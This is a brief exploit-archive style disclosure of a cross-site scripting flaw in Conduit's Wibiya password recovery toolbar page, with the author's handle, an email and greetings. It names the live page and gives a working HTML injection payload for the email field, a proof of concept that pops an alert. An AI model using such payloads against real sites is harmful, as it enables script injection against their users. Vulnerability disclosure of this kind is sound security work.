Conduit Wibiya Password Recovery Toolbar suffers from a cross site scripting vulnerability.
2cd0fd51b59c5e5b3d4e47bfa6cba3c3f7773f46344b205800e726db6175a6ff
TITLE: Conduit wibiya password recovery toolbar Cross site Scripting
vendor: Conduit
Author: r007k17-w
Email: n4gb07@gmail.com
My blog: http://shadowrootkit.wordpress.com/
Google Dork: © 2012 Conduit <http://www.conduit.com/>
-------------------------------------------------------------------------------------------------------------------------------------------
DEMO: http://wibiya.conduit.com/toolbar_password_recovery
Password Recovery Toolbar
POSTDATA: "'><img src=vul onerror=alert('r007k17-w')> in the 'email address
field
---------------------------------------------------------------------------------------------------------------------------------------------
gr33t1ngs to s1d3-3ff3cts,L0rd CrUs4d3r,3ps1lonl4mbd4,A1-w1n6( N17|<
),1nJ3ct0r t3am and all my friends
-----------------------------------------------------------------------------------------------------